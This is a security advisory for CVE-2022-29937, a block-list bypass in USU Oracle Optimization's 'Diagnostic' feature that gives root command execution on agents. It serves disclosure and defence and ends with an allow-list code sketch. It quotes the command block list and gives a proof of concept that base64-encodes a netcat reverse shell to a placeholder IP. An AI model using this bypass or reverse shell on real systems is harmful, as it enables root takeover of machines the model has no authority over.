CVE-2022-29937

USU Oracle Optimization before 5.17.5 allows authenticated DataCollection users to achieve agent root access because some common OS commands are blocked but (for example) an OS command for base64 decoding is not blocked. NOTE: this is not an Oracle Corporation product.

A block list bypass allows execution of arbitrary commands on agents through the “Diagnostic” feature.

A user with the “DataCollection” profile can launch any shell command from the server as root on agents.

The “Diagnostic” feature allows running shell commands. These commands are run on agents as root.
The following block list is implemented in order to prevent arbitrary command execution.

"rm", "kill", "mkfs", "reboot", "vi", "vim", "mv", "poweroff", "shred", "mount", "umount", "shutdown", "dd", "init", "touch", "chmod", "curl", "history", "id", "last", "nano", "password", "sshd", "useradd", "userdel", "wget" 

This block list can be trivially bypassed.

This proof of concept demonstrates the possibility of establishing a reverse shell on an agent.

$ echo "nc -e /bin/bash <your ip> 4444" | base64
bmMgLWUgL2Jpbi9i<REDACTED>

Then launch a TCP listener on your machine.

$ nc -vnl 4444
Listening on 0.0.0.0 4444

On the web interface, select the following tab:
“Data collection” -> “Collectors management” -> “Batch operations”

Select an agent and create a new batch operation. Select "Diagnostic".

You should receive an incoming connection on the TCP listener.

Connection Received on <REDACTED>
id
uid=0(root) gid=0(root) groups=0(root) 

We recommend using an allow list approach.
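The sketch below is an added example, not part of the original advisory or the product's code. It contrasts a word-matching model of the block list above with an allow list that maps named diagnostics to fixed argument vectors. The matching logic, the diagnostic names and the binary paths are assumptions made for illustration.

```python
import base64
import re
import subprocess

# Block list as quoted in the advisory.
BLOCK_LIST = {
    "rm", "kill", "mkfs", "reboot", "vi", "vim", "mv", "poweroff", "shred",
    "mount", "umount", "shutdown", "dd", "init", "touch", "chmod", "curl",
    "history", "id", "last", "nano", "password", "sshd", "useradd",
    "userdel", "wget",
}

# Hypothetical allow list: diagnostic name -> fixed argv (no user-supplied text).
ALLOWED_DIAGNOSTICS = {
    "disk_usage": ["/bin/df", "-h"],
    "uptime": ["/usr/bin/uptime"],
    "kernel_version": ["/bin/uname", "-r"],
}


def blocklist_permits(command: str) -> bool:
    """Assumed model of the filter: reject if any word is a blocked name."""
    words = re.findall(r"[\w.+-]+", command)
    return not any(w in BLOCK_LIST for w in words)


def resolve_diagnostic(name: str) -> list:
    """Allow list: map a diagnostic name to its fixed argv, or refuse."""
    if name not in ALLOWED_DIAGNOSTICS:
        raise ValueError(f"diagnostic not permitted: {name!r}")
    return list(ALLOWED_DIAGNOSTICS[name])


def run_diagnostic(name: str) -> str:
    """Execute an allowed diagnostic without a shell, so no string is parsed."""
    argv = resolve_diagnostic(name)
    done = subprocess.run(argv, shell=False, capture_output=True,
                          text=True, timeout=10, env={}, check=False)
    return done.stdout


# Constructed sample: the blocked word "id", hidden by base64 encoding.
HIDDEN = base64.b64encode(b"id").decode()
SAMPLE = f"echo {HIDDEN} | base64 -d"
```

The block list model rejects `id` typed directly but permits `SAMPLE`, because the filter only ever sees the encoded text. The allow list refuses anything that is not one of its named diagnostics, whatever the string contains.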
